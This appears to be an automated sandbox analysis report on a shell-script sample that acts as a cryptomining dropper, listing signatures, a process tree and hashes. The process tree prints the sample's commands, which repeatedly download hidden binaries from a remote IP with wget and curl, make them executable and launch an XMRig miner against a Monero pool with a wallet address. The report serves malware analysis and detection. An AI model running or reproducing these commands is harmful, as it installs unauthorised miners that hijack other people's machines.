Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:53
Static task
static1
Behavioral task
behavioral1
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
-
Size
700B
-
MD5
c4d089011765cf8fa828d28b6eeeac3e
-
SHA1
43d933e706b0eefd0db2b5acba19205ebc1af2bd
-
SHA256
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
-
SHA512
3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_xmrig behavioral4/files/fstream-1.dat xmrig -
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 885 chmod 850 chmod 855 chmod 856 chmod 862 chmod 878 chmod 879 chmod 896 chmod 844 chmod 849 chmod 861 chmod 873 chmod 829 chmod 830 chmod 843 chmod 889 chmod 895 chmod 831 chmod 867 chmod 872 chmod 884 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /.__min__c 835 .__min__c /.__min__ 837 .__min__ /.__min__c 845 .__min__c /.__min__c 851 .__min__c /.__min__c 857 .__min__c /.__min__c 863 .__min__c /.__min__ 869 .__min__ /.__min__c 874 .__min__c /.__min__c 880 .__min__c /.__min__c 886 .__min__c /.__min__ 891 .__min__ /.__min__c 897 .__min__c -
resource yara_rule behavioral4/files/fstream-2.dat upx -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/devices/system/cpu nproc -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 837 .__min__ 869 .__min__ 891 .__min__
Processes
-
/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh1⤵PID:718
-
/usr/bin/wgetwget 205.185.117.101/log2 -O /dev/null2⤵PID:720
-
-
/usr/bin/curlcurl -L 205.185.117.101/log2 -o /dev/null2⤵
- Reads runtime system information
PID:738
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:747
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:824
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:825
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:829
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:830
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:831
-
-
/usr/bin/nprocnproc --all2⤵
- Enumerates kernel/hardware configuration
PID:832
-
-
/bin/hostnamehostname2⤵PID:834
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:835
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:840
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:841
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:842
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:843
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:844
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:845
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:847
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:848
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:849
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:850
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:853
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:854
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:855
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:856
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:857
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:859
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:860
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:861
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:862
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:863
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:865
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:866
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:867
-
-
/bin/hostnamehostname2⤵PID:868
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:871
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:872
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:873
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:874
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:876
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:877
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:878
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:879
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:880
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:882
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:883
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:884
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:885
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:886
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:888
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:889
-
-
/bin/hostnamehostname2⤵PID:890
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:893
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:894
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:895
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:896
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:897
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:899
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:900
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.2MB
MD58f96e8b4e9d26884c776c1b42a70bae5
SHA153a4166052211abf77e1edf0d71c7a6faae12cc5
SHA2565e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
SHA5124709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec
-
Filesize
5.2MB
MD5dc32e92b600c8e7f2c3fb65e7ea6cbac
SHA1be717f5490537cb5e222c178f0bd93534a166e67
SHA256939d145d0baa07b0febb17d5cff0765a5f27f5500b520ed66c6e2205a697440a
SHA512ece31e619ce7e6dcdca4a6c65a1ce689a30663a8e630eea316d79b3ad70d5b8c4dc28d30b836c27e8151e1d07ea62377ae8765d0f6144a31a91559c171b6022b
-
Filesize
1.6MB
MD5d3e378df1f5f920faaf9ef9e14a54f55
SHA1b039ff3865762819392cec53eeac7c8ee0a630c3
SHA25658fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
SHA51240ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358
-
Filesize
2.9MB
MD5d98aa7684a42d8197b0eb2946c6d4fab
SHA1a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
SHA256bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
SHA512e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee